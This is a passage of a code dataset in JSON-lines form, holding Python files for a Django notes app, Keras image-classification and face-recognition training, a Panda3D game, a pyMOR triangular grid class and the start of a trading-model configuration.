pd.DataFrame(columns = [\"Number of Samples\", \"Mean Biased Variance\", \"Mean Unbiased Variance\"])\n for i in range(1,num_samples_max+1, 5):\n temp_df = pd.DataFrame(columns = [\"Mean\", \"Biased Variance\", \"Unbiased Variance\"])\n for j in range(i):\n sample = self.get_sample(sample_size)\n temp_df.loc[len(temp_df.index)] = [sample[\"mean\"], sample[\"bi-var\"], sample[\"unbi-var\"]]\n aggregate_df.loc[len(aggregate_df.index)] = [i, temp_df.mean()[\"Biased Variance\"], temp_df.mean()[\"Unbiased Variance\"]]\n return aggregate_df\n ","sub_path":"NormalPopulation.py","file_name":"NormalPopulation.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352233810","text":"from django.shortcuts import redirect\nfrom Jingo.models import *\nhttp_res = HttpRequestResponser()\n\ndef init(request):\n # for post notes\n data = {}\n data['uid'] = request.session['uid']\n data['tagslist'] = Tag().getUserCategoryTagsList(data)\n #data = dict([('tagslist', data)])\n #print data\n data['n_request'] = len(Friend.objects.filter(f_uid=data['uid'], is_friendship=2).values())\n return Formatter().createResultSet(data)\n\ndef index(request):\n page = 'login.html'\n if request.session.get('uid', False):\n page = 'index.html'\n data = init(request)\n return http_res.response(request, page, data)\n return http_res.response(request, page)\n\ndef admin(request):\n if isRedirect(request):\n page = 'admin.html'\n data = AdminArea().init()\n \n return http_res.response(request, page, data)\n\ndef isRedirect(request, target='index'):\n if request.session.get('uid', False):\n return redirect(target)\n return False\n\n# redirect to specific pages\ndef pages(request, mode):\n if mode == 'signup':\n return 
http_res.response(request, 'signup.html')\n\n if mode == 'login':\n if request.session.get('uid', False):\n return redirect('index')\n else:\n return http_res.response(request, 'login.html')\n\n if mode == 'profile':\n if request.session.get('uid', False):\n usr = request.session['usrdata']\n return http_res.response(request, 'profile.html', dict([('stateslist', State().getUserStatesAndFiltersList(usr))]))\n else: \n return redirect('/pages/login/')\n \n if mode == 'friends':\n if request.session.get('uid', False):\n return http_res.response(request, 'friends.html', User().initFriendArea(request))\n else: \n return redirect('/pages/login/')\n\n# deal with AJAX request and database access\ndef tasks(request, mode):\n # API for user behaviors\n if mode == 'logout':\n data = User().logout(request)\n return redirect('/pages/login/')\n\n if mode == 'signup':\n page = 'profile.html'\n data = User().signup(request)\n if data['result']:\n return redirect('/pages/profile/')\n else:\n return http_res.response(request, 'signup.html', data)\n\n if mode == 'login':\n data = User().login(request)\n if data['result']:\n return redirect('index')\n else:\n return http_res.response(request, 'login.html', data)\n\n # API for profile settings\n if mode == 'setDefaultState':\n data = State().setDefaultState(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'addState':\n page = 'state.html'\n data = State().addState(request)\n return http_res.response(request, page, data)\n\n if mode == 'deleteState':\n data = State().deleteState(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'updateState':\n data = State().updateState(request)\n return http_res.responseJSON(request, data)\n\n # API for filter settings\n if mode == 'activateFilter':\n data = Filter().activateFilter(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'addFilter':\n data = Filter().addFilterAndTag(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'deleteFilter':\n data = Filter().deleteFilter(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'updateFilter':\n data = Filter().updateFilter(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'retrieveFilter':\n page = 'filter.html'\n data = Filter().retrieveFilter(request)\n return http_res.response(request, page, data)\n\n # API for note settings\n if mode == 'postNote':\n data = User().postNote(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'searchNotes':\n data = User().searchNotes(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'postComment':\n data = User().postComment(request)\n return http_res.responseJSON(request, data)\n \n if mode == 'deleteNoteTag':\n data = User().deleteNoteTag(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'addExtraNoteTag':\n data = User().addExtraNoteTag(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'clickLike':\n data = User().clickLike(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'receiveNotes':\n data = User().receiveNotes(request)\n return http_res.responseJSON(request, data)\n \n if mode == 'readNote':\n page = 'note.html'\n data = User().readNote(request)\n return http_res.response(request, page, data)\n\n # API for Friendship settings\n if mode == 'sendInvitation':\n data = User().sendInvitation(request)\n return http_res.responseJSON(request, data)\n \n if mode == 'replyInvitation':\n data = User().replyInvitation(request)\n 
return http_res.responseJSON(request, data)\n \n if mode == 'unfollow':\n data = User().unfollow(request)\n return http_res.responseJSON(request, data)\n ","sub_path":"Jingo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"198015960","text":"\"\"\"\n Name: train_model.py\n Created: 10/7/2017\n Description: Fine-tune inception v3 for Planet Amazon.\n\"\"\"\n#==============================================\n# Modules\n#==============================================\nimport os\nimport sys\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=sys.argv[1]\nimport numpy as np\nimport pandas as pd\nimport time\nimport gzip\nimport pickle\nfrom collections import Counter\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom keras.models import Model, model_from_json\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras import backend as K\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras.applications.imagenet_utils import decode_predictions\nfrom keras.optimizers import SGD, Adam\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import fbeta_score\nfrom tqdm import tqdm\n#==============================================\n# Files\n#==============================================\n_EPSILON = K.epsilon()\nfrom extend_image_data_generator import ImageDataGenerator\n\n\n#==============================================\n# Functions\n#==============================================\ndef instantiate(n_classes, n_dense=2048, inception_json=\"inceptionv3_128_mod.json\", target_size=(139,139,3), verbose=1):\n \"\"\"\n Instantiate the inception v3.\n \"\"\"\n\n # create the base pre-trained model\n base_model = InceptionV3(weights='imagenet', include_top=False, input_shape=target_size)\n\n # add a global spatial average pooling layer\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n # let's add a fully-connected layer\n x = Dense(n_dense, activation='relu')(x)\n # and a final logistic layer\n predictions = Dense(n_classes, activation='sigmoid')(x)\n\n # this is the model we will train\n model = Model(inputs=base_model.input, outputs=predictions)\n\n # first: train only the top layers (which were randomly initialized)\n # i.e. 
freeze all convolutional InceptionV3 layers\n for layer in base_model.layers:\n layer.trainable = False\n\n # compile the model (should be done *after* setting layers to non-trainable)\n model.compile(optimizer=Adam(lr=0.001), loss=\"binary_crossentropy\", metrics=[fbs])\n\n # serialize model to json\n model_json = model.to_json()\n with open(inception_json, \"w\") as iOF:\n iOF.write(model_json)\n\n return base_model, model\n\n\n\n\ndef finetune(base_model, model, X_train, y_train, X_val, y_val,\n epochs_1=1000, patience_1=2,\n patience_lr=1, batch_size=32,\n nb_train_samples=41000, nb_validation_samples=7611,\n img_width=299, img_height=299, class_imbalance=False,\n inception_h5_1=\"inceptionv3_128_fine_tuned_1.h5\",\n inception_h5_check_point_1=\"inceptionv3_128_fine_tuned_check_point_1.h5\",\n layer_names_file=\"inceptionv3_128_mod_layer_names.txt\", verbose=1):\n \"\"\"\n Finetune the inception v3.\n \"\"\"\n\n # let's visualize layer names and layer indices to see how many layers\n # we should freeze:\n with open(layer_names_file, \"w\") as iOF:\n for ix, layer in enumerate(model.layers):\n iOF.write(\"%d, %s\\n\"%(ix, layer.name))\n if verbose >= 4: print(ix, layer.name)\n\n # this is the augmentation configuration we will use for training\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.2,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.4,\n p_shift=0.4)\n\n # this is the augmentation configuration we will use for testing:\n test_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.,\n p_shift=0.)\n\n # define train & val data generators\n train_generator = train_datagen.flow(\n X_train,\n y_train,\n batch_size=batch_size,\n shuffle=True)\n\n validation_generator = test_datagen.flow(\n X_val,\n y_val,\n batch_size=batch_size,\n shuffle=True)\n\n # get class weights\n if class_imbalance:\n class_weight = get_class_weights(np.sum(y_train, axis=0), smooth_factor=0.1)\n else:\n class_weight = None\n\n # train the model on the new data for a few epochs on the batches generated by datagen.flow().\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs_1,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=[EarlyStopping(monitor='val_loss', patience=patience_1),\n ModelCheckpoint(filepath=inception_h5_check_point_1, save_best_only=True),\n ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=patience_lr)],\n class_weight=class_weight)\n\n # save weights just in case\n model.save_weights(inception_h5_1)\n\n\n\n\ndef finetune_from_saved(inception_h5_load_from, inception_h5_save_to,\n inception_json, X_train, y_train, X_val, y_val, nb_freeze=172,\n epochs=5000, patience=2, patience_lr=1, batch_size=32,\n nb_train_samples=85639, nb_validation_samples=10694, optimizer_lr=0.0002,\n img_width=299, img_height=299, class_imbalance=False,\n inception_h5_check_point=\"inceptionv3_128_fine_tuned_check_point_2.h5\", verbose=1):\n \"\"\"\n Finetune the inception v3 from already fine-tuned one.\n \"\"\"\n\n # load json and create model\n with 
open(inception_json, 'r') as iOF:\n loaded_model_json = iOF.read()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n loaded_model.load_weights(inception_h5_load_from)\n if verbose >= 1: print(\"Loaded model from disk\")\n\n # we freeze the first nb_freeze layers and unfreeze the rest:\n for layer in loaded_model.layers[:nb_freeze]:\n layer.trainable = False\n for layer in loaded_model.layers[nb_freeze:]:\n layer.trainable = True\n\n # we need to recompile the model for these modifications to take effect\n # we use SGD with a low learning rate\n loaded_model.compile(optimizer=Adam(lr=optimizer_lr), loss=\"binary_crossentropy\", metrics=[fbs])\n\n # this is the augmentation configuration we will use for training\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.2,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.4,\n p_shift=0.4)\n\n # this is the augmentation configuration we will use for testing:\n test_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.,\n p_shift=0.)\n\n # define train & val data generators\n train_generator = train_datagen.flow(\n X_train,\n y_train,\n batch_size=batch_size,\n shuffle=True)\n\n validation_generator = test_datagen.flow(\n X_val,\n y_val,\n batch_size=batch_size,\n shuffle=True)\n\n # get class weights\n if class_imbalance:\n class_weight = get_class_weights(np.sum(y_train, axis=0), smooth_factor=0.1)\n else:\n class_weight = None\n\n # train the model on the new data for a few epochs on the batches generated by datagen.flow().\n loaded_model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=[EarlyStopping(monitor='val_loss', patience=patience),\n ModelCheckpoint(filepath=inception_h5_check_point, save_best_only=True),\n ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=patience_lr)],\n class_weight=class_weight)\n\n # save weights\n loaded_model.save_weights(inception_h5_save_to)\n\n\n\n\n\ndef preprocess_input(x):\n \"\"\"\n Preprocessing step for inception v3.\n \"\"\"\n x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\n\n\n\ndef get_class_weights(y, smooth_factor=0):\n \"\"\"\n Returns the weights for each class based on the frequencies of the samples\n :param smooth_factor: factor that smooths extremely uneven weights\n :param y: list of true labels (the labels must be hashable)\n :return: dictionary with the weight for each class\n \"\"\"\n\n if smooth_factor > 0:\n p = y.max() * smooth_factor\n y = y + p\n\n majority = float(y.max())\n\n return {clss: (majority / cnt) for clss, cnt in enumerate(y)}\n\n\n\ndef f2_score(y_true, y_pred):\n # fbs throws a confusing error if inputs are not numpy arrays\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n # We need to use average='samples' here, any other average method will generate bogus results\n return fbs(y_true, y_pred, beta=2, average='samples')\n\n\n\ndef fbs(y_true, y_pred, threshold_shift=0.3, beta=2):\n\n # just in case of hipster activation at 
the final layer\n y_pred = K.clip(y_pred, 0, 1)\n\n # shifting the prediction threshold from .5 if needed\n y_pred_bin = K.round(y_pred + threshold_shift)\n\n tp = K.sum(K.round(y_true * y_pred_bin)) + K.epsilon()\n fp = K.sum(K.round(K.clip(y_pred_bin - y_true, 0, 1)))\n fn = K.sum(K.round(K.clip(y_true - y_pred_bin, 0, 1)))\n\n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n\n beta_squared = beta ** 2\n return (beta_squared + 1) * (precision * recall) / (beta_squared * precision + recall + K.epsilon())\n\n\n\ndef binary_crossentropy_weighted(y_true, y_pred, one_weight=4.):\n y_weight = K.clip(y_true * one_weight, 1., one_weight)\n out = K.binary_crossentropy(y_pred, y_true) * y_weight\n return K.mean(out, axis=-1)\n\n\n\n\ndef train_for_a_fold(df_train, df_val, fold_id, target_size=(139,139),\n model_dir=\"../data/planet_amazon/models/\",\n image_dir=\"../data/planet_amazon/train-jpg/\",\n verbose=1):\n \"\"\"\n Train an Inception V3 for a fold.\n \"\"\"\n\n if verbose >= 1: print(\"Training for fold %d...\"%fold_id)\n\n ### Prepare weights\n labels = ['agriculture', 'artisinal_mine', 'bare_ground', 'blooming',\\\n 'blow_down', 'clear', 'cloudy', 'conventional_mine', 'cultivation',\\\n 'habitation', 'haze', 'partly_cloudy', 'primary', 'road',\\\n 'selective_logging', 'slash_burn', 'water']\n n_labels = np.array([12315, 339, 862, 332, 98, 28431,\n 9350, 100, 4477, 3660, 2697, 7261,\n 37513, 8071, 340, 209, 7411])\n label_weights = np.array([cw for cid, cw in sorted(get_class_weights(n_labels).items())])\n label_counts = np.ceil( 10. * label_weights / label_weights.max() ).astype(int)\n\n ### Load images\n if verbose >= 1: print(\"\\tLoading images into RAM (fold %d)...\"%fold_id)\n X_train, y_train = [], []\n X_val, y_val = [], []\n # for train and validation\n for df, X, y, n_max_img in [(df_train, X_train, y_train, 1), (df_val, X_val, y_val, 1)]:\n for image_id, y_lab in tqdm(list(zip(df.image_name, df.iloc[:,2:].values)), miniters=100):\n image_path = image_dir+str(image_id)+\".jpg\"\n if os.path.exists(image_path):\n try:\n img = load_img(image_path, target_size=target_size)\n arr = img_to_array(img)\n for _ in range(min((int(np.max(label_counts * y_lab)), n_max_img))):\n X.append(arr)\n y.append(y_lab)\n except OSError:\n if verbose >= 2: print(\"OSError on image %s.\"%image_path)\n else:\n raise(ValueError(\"Image %s does not exist.\"%image_path))\n X_train = np.array(X_train)\n X_val = np.array(X_val)\n y_train = np.array(y_train)\n y_val = np.array(y_val)\n if verbose >= 2:\n print(X_train.shape)\n print(y_train.shape)\n print(X_val.shape)\n print(y_val.shape)\n print(np.mean(y_train, axis=0))\n print(np.mean(y_val, axis=0))\n\n ### Create model\n if verbose >= 1: print(\"\\tInstantiating Inception V3 (fold %d)...\"%fold_id)\n n_classes = y_train.shape[1]\n base_model, model = instantiate(n_classes, n_dense=2048, inception_json=model_dir+\"inceptionv3_128_mod_%d.json\"%fold_id, verbose=verbose)\n\n ### Train model\n if verbose >= 1: print(\"\\tFine-tuning Inception V3 first pass (fold %d)...\"%fold_id)\n finetune(base_model, model, X_train, y_train, X_val, y_val, batch_size=64, epochs_1=5,\n nb_train_samples=len(y_train), nb_validation_samples=len(y_val),\n patience_1=2, patience_lr=1, class_imbalance=False,\n inception_h5_1=model_dir+\"inceptionv3_128_fine_tuned_1_%d.h5\"%fold_id,\n inception_h5_check_point_1=model_dir+\"inceptionv3_128_fine_tuned_check_point_1_%d.h5\"%fold_id,\n layer_names_file=model_dir+\"inceptionv3_128_mod_layer_names.txt\",\n verbose=verbose)\n 
del(base_model)\n    del(model)\n    K.clear_session()\n    if verbose >= 1: print(\"\\tFine-tuning Inception V3 second pass (fold %d)...\"%fold_id)\n    finetune_from_saved(model_dir+\"inceptionv3_128_fine_tuned_check_point_1_%d.h5\"%fold_id,\n                        model_dir+\"inceptionv3_128_fine_tuned_2_%d.h5\"%fold_id,\n                        model_dir+\"inceptionv3_128_mod_%d.json\"%fold_id,\n                        X_train, y_train, X_val, y_val, batch_size=64, nb_freeze=172,\n                        patience=5, patience_lr=1, class_imbalance=False, epochs=10, optimizer_lr=0.0004,\n                        nb_train_samples=len(y_train), nb_validation_samples=len(y_val),\n                        inception_h5_check_point=model_dir+\"inceptionv3_128_fine_tuned_check_point_2_%d.h5\"%fold_id,\n                        verbose=verbose)\n    K.clear_session()\n    if verbose >= 1: print(\"\\tFine-tuning Inception V3 third pass (fold %d)...\"%fold_id)\n    finetune_from_saved(model_dir+\"inceptionv3_128_fine_tuned_check_point_2_%d.h5\"%fold_id,\n                        model_dir+\"inceptionv3_128_fine_tuned_3_%d.h5\"%fold_id,\n                        model_dir+\"inceptionv3_128_mod_%d.json\"%fold_id,\n                        X_train, y_train, X_val, y_val, batch_size=64, nb_freeze=0,\n                        patience=10, patience_lr=3, class_imbalance=False, optimizer_lr=0.00004,\n                        nb_train_samples=len(y_train), nb_validation_samples=len(y_val),\n                        inception_h5_check_point=model_dir+\"inceptionv3_128_fine_tuned_check_point_3_%d.h5\"%fold_id,\n                        verbose=verbose)\n    K.clear_session()\n\n\n\n\n#==============================================\n# Main\n#==============================================\nif __name__ == '__main__':\n    fold_id = int(sys.argv[2])\n    df_train = pd.read_csv(\"../data/planet_amazon/train%d.csv\"%fold_id)\n    df_val = pd.read_csv(\"../data/planet_amazon/val%d.csv\"%fold_id)\n    train_for_a_fold(df_train, df_val, fold_id, verbose=2)\n","sub_path":"train_model_inceptionv3_128.py","file_name":"train_model_inceptionv3_128.py","file_ext":"py","file_size_in_byte":16041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"157686718","text":"from direct.showbase.ShowBase import ShowBase\nfrom controller import Controller\n\nclass Game(ShowBase):\n    def __init__(self):\n        ShowBase.__init__(self)\n        self.model = loader.loadModel('models/environment')\n        self.model.reparentTo(render)\n        self.model.setScale(0.1)\n        self.model.setPos(-2, 20, -3)\n        # set the camera lens field of view\n        base.camLens.setFov(70)\n\n        skybox = loader.loadModel('skybox.egg')\n        skybox.setScale(1024)\n        skybox.reparentTo(render)\n\n        # create the mouse and keyboard controller\n        self.controller = Controller()\n\n        self.controller.setMovingStep(1)\n\ngame = Game()\ngame.run()\n","sub_path":"example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"345932676","text":"'''\nauthor:Skymos Wu\nversion:0.5\n'''\n# load the Keras libraries\nimport keras\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Activation,Convolution2D,Dropout,MaxPooling2D,Flatten\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import TensorBoard\n# load the data-processing libraries\nfrom utils.load_data import load_data\nimport numpy as np\nimport os\nfrom playsound import playsound\n\ndef construct_model(people,nb_filters1=32,nb_filters2=64,nb_pool=2,nb_conv=3):\n    '''\n    Function for building the model. The architecture follows the structure of AlexNet and is composed as follows:\n    \n    '''\n    model = Sequential()\n    model.add(Convolution2D(nb_filters1, (nb_conv, nb_conv),border_mode='valid',input_shape=(56,56,3),data_format='channels_last'))\n    model.add(Activation('tanh'))\n    
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n\n    model.add(Convolution2D(nb_filters2, (nb_conv, nb_conv)))\n    model.add(Activation('tanh'))\n    model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n    model.add(Dropout(0.25))\n\n    model.add(Flatten())\n    model.add(Dense(1000)) # fully connected layer\n    model.add(Activation('tanh'))\n    model.add(Dropout(0.5))\n    model.add(Dense(people))\n    model.add(Activation('softmax'))\n    model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n    print('Model construction complete.')\n    playsound('alert/nncomplete.mp3')\n    return model\n\ndef load():\n    '''\n    Utility function for loading and normalizing the data\n    '''\n    (x_train,y_train,classes) = load_data('face-data')\n    x_train = x_train / 255\n    y_use = list(np.arange(0,classes))\n    tempst = sorted(list(set(y_train)))\n    dct = dict(zip(tempst,y_use))\n    y_fit = []\n    for i in y_train:\n        y_fit.append(dct[i])\n    y_fit = np.array(y_fit)\n    y_fit = np_utils.to_categorical(y_fit,num_classes=classes)\n    return x_train,y_fit,classes,dct\n\nif __name__ == '__main__':\n    x_train,y_train,classes,dct = load()\n    # use ImageDataGenerator to generate noisy data and improve the model's generalization\n    tb = TensorBoard(log_dir='./logs',write_graph=True,write_images=True)\n    model = construct_model(classes)\n    model.fit(x_train,y_train,epochs=200,callbacks=[tb])\n    playsound('alert/tc.mp3')\n    # save the model\n    model.save('face-model.h5')\n    \n","sub_path":"model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"589268647","text":"# This file is part of the pyMOR project (http://www.pymor.org).\n# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler\n# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nfrom pymor.grids.interfaces import AffineGridInterface\nfrom pymor.grids.referenceelements import triangle\n\n\nclass TriaGrid(AffineGridInterface):\n    '''Basic implementation of a triangular grid on a rectangular domain.\n\n    The global face, edge and vertex indices are given as follows ::\n\n        6---10----7---11----8\n        | \\ 6   | \\ 7   |\n        3 14  4 15  5\n        | 2 \\ | 3 \\ |\n        3----8----4----9----5\n        | \\ 4   | \\ 5   |\n        0 12  1 13  2\n        | 0 \\ | 1 \\ |\n        0----6----1----7----2\n\n    Parameters\n    ----------\n    num_intervals\n        Tuple `(n0, n1)` determining a grid with `n0` x `n1` codim-0 entities.\n    domain\n        Tuple `(ll, ur)` where `ll` defines the lower left and `ur` the upper right\n        corner of the domain.\n    '''\n\n    dim = 2\n    dim_outer = 2\n    reference_element = triangle\n\n    def __init__(self, num_intervals=(2, 2), domain=[[0, 0], [1, 1]]):\n        self.num_intervals = num_intervals\n        self.domain = np.array(domain)\n\n        self.x0_num_intervals = num_intervals[0]\n        self.x1_num_intervals = num_intervals[1]\n        self.x0_range = self.domain[:, 0]\n        self.x1_range = self.domain[:, 1]\n        self.x0_width = self.x0_range[1] - self.x0_range[0]\n        self.x1_width = self.x1_range[1] - self.x1_range[0]\n        self.x0_diameter = self.x0_width / self.x0_num_intervals\n        self.x1_diameter = self.x1_width / self.x1_num_intervals\n        n_elements = self.x0_num_intervals * self.x1_num_intervals * 2\n\n        # TOPOLOGY\n        self.__sizes = (n_elements,\n                        ((self.x0_num_intervals + 1) * self.x1_num_intervals +\n                         (self.x1_num_intervals + 1) * self.x0_num_intervals +\n                         int(n_elements / 2)),\n                        (self.x0_num_intervals + 1) * (self.x1_num_intervals + 1))\n\n        # calculate subentities -- codim-0\n        edge_hoffset = (self.x0_num_intervals + 1) * 
self.x1_num_intervals\n        edge_doffset = edge_hoffset + self.x0_num_intervals * (self.x1_num_intervals + 1)\n        E0V = ((np.arange(self.x1_num_intervals, dtype=np.int32) * (self.x0_num_intervals + 1))[:, np.newaxis] +\n               np.arange(self.x0_num_intervals, dtype=np.int32)).ravel()\n        E0H = np.arange(n_elements // 2, dtype=np.int32) + edge_hoffset\n        E0D = np.arange(n_elements // 2, dtype=np.int32) + edge_doffset\n\n        E1V = E0V + 1\n        E1H = E0H + self.x0_num_intervals\n        E1D = E0D\n\n        codim0_subentities = np.vstack((np.vstack((E0D, E0V, E0H)).T, np.vstack((E1D, E1V, E1H)).T))\n\n        # calculate subentities -- codim-1\n\n        V0 = E0V[:, np.newaxis] + np.array([0, 1, self.x0_num_intervals + 1], dtype=np.int32)\n        V1 = E0V[:, np.newaxis] + np.array([self.x0_num_intervals + 2, self.x0_num_intervals + 1, 1], np.int32)\n        codim1_subentities = np.vstack((V0, V1))\n        self.__subentities = (codim0_subentities, codim1_subentities)\n\n        # GEOMETRY\n\n        # embeddings\n        x0_shifts0 = np.arange(self.x0_num_intervals) * self.x0_diameter + self.x0_range[0]\n        x1_shifts0 = np.arange(self.x1_num_intervals) * self.x1_diameter + self.x1_range[0]\n        x0_shifts1 = x0_shifts0 + self.x0_diameter\n        x1_shifts1 = x1_shifts0 + self.x1_diameter\n        B = np.vstack((np.array(np.meshgrid(x0_shifts0, x1_shifts0)).reshape((2, -1)).T,\n                       np.array(np.meshgrid(x0_shifts1, x1_shifts1)).reshape((2, -1)).T))\n        A0 = np.tile(np.diag([self.x0_diameter, self.x1_diameter]), (n_elements // 2, 1, 1))\n        A1 = - A0\n        A = np.vstack((A0, A1))\n        self.__embeddings = (A, B)\n\n    def __str__(self):\n        return (('Tria-Grid on domain [{xmin},{xmax}] x [{ymin},{ymax}]\\n' +\n                 'x0-intervals: {x0ni}, x1-intervals: {x1ni}\\n' +\n                 'faces: {faces}, edges: {edges}, vertices: {vertices}')\n                .format(xmin=self.x0_range[0], xmax=self.x0_range[1],\n                        ymin=self.x1_range[0], ymax=self.x1_range[1],\n                        x0ni=self.x0_num_intervals, x1ni=self.x1_num_intervals,\n                        faces=self.size(0), edges=self.size(1), vertices=self.size(2)))\n\n    def size(self, codim=0):\n        assert 0 <= codim <= 2, 'Invalid codimension'\n        return self.__sizes[codim]\n\n    def subentities(self, codim, subentity_codim):\n        assert 0 <= codim <= 2, 'Invalid codimension'\n        assert codim <= subentity_codim <= 2, 'Invalid subentity codimension'\n        if codim == 0:\n            if subentity_codim == 0:\n                return np.arange(self.size(0), dtype='int32')[:, np.newaxis]\n            else:\n                return self.__subentities[subentity_codim - 1]\n        else:\n            return super(TriaGrid, self).subentities(codim, subentity_codim)\n\n    def embeddings(self, codim=0):\n        if codim == 0:\n            return self.__embeddings\n        else:\n            return super(TriaGrid, self).embeddings(codim)\n","sub_path":"src/pymor/grids/tria.py","file_name":"tria.py","file_ext":"py","file_size_in_byte":5365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"44497395","text":"#! 
/usr/bin/env python2.7\r\n# -*- coding: utf-8 -*-\r\n# @author Bin Hong\r\n\r\n\"\"\"\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nimport platform\r\nimport socket\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\n\r\nlocal_path = os.path.dirname(__file__)\r\nroot = os.path.join(local_path, '..')\r\nsys.path.append(root)\r\n\r\nfrom main.base.score2 import ScoreLabel\r\n\r\nfrom main.work import model\r\nfrom main.work import build\r\nfrom main.work import pred\r\nfrom main.work.conf import MltradeConf\r\nfrom main.ta import ta_set\r\nfrom main.model.spliter import StaticSpliter\r\nfrom main.classifier.tree import MyRandomForestClassifier\r\nfrom main.classifier.tree import RFCv1n2000md6msl100\r\nfrom main.classifier.tree import MyGradientBoostingClassifier\r\nfrom main.classifier.tree import MyLogisticRegressClassifier\r\n\r\n\r\nif platform.platform().startswith(\"Windows\"):\r\n TEST = True\r\nelif platform.platform().startswith(\"Darwin\"):\r\n TEST = True\r\nelif '47.90.41.27' == socket.gethostbyname(socket.gethostname()):\r\n TEST = True\r\nelse:\r\n TEST = False\r\n\r\ndef getConf2():\r\n \"\"\"\r\n for test\r\n :return:\r\n \"\"\"\r\n classifier = MyRandomForestClassifier()\r\n confer = MltradeConf(500,classifier=classifier, score1=ScoreLabel(5, 1.0),\r\n score2 = ScoreLabel(5, 1.0),\r\n model_split=StaticSpliter(2010,2013,1, 1900, 2010),\r\n valid_split=StaticSpliter(2013, 2017, 1, 1900, 2010),\r\n ta = ta_set.TaSetBase1Ext8(), n_pool=25)\r\n\r\n return confer\r\n\r\ndef getConf():\r\n if not TEST:\r\n #classifier = MyRandomForestClassifier(n_estimators = 1000)\r\n classifier = MyGradientBoostingClassifier(n_estimators = 100)\r\n classifier = RFCv1n2000md6msl100()\r\n classifier = MyLogisticRegressClassifier()\r\n ta = ta_set.TaSetBase1Ext4El()\r\n confer = MltradeConf(150,classifier=classifier, score1=ScoreLabel(5, 1.0),\r\n score2 = ScoreLabel(5, 1.0),\r\n model_split=StaticSpliter(2010,2017,1, 1700, 2010),\r\n valid_split=StaticSpliter(2013, 2017, 1, 1700, 2010),\r\n ta = ta, n_pool=30, index=\"sp100\")\r\n confer.syms = confer.syms[0:1]\r\n\r\n else:\r\n ta = ta_set.TaSetBase1()\r\n clazz = MyRandomForestClassifier(n_estimators=10, min_samples_leaf=10)\r\n clazz = MyLogisticRegressClassifier()\r\n confer = MltradeConf(2,\r\n classifier= clazz,\r\n score1=ScoreLabel(5, 1.0),\r\n score2 = ScoreLabel(5, 1.0),\r\n model_split=StaticSpliter(2010,2013, 1, 2000, 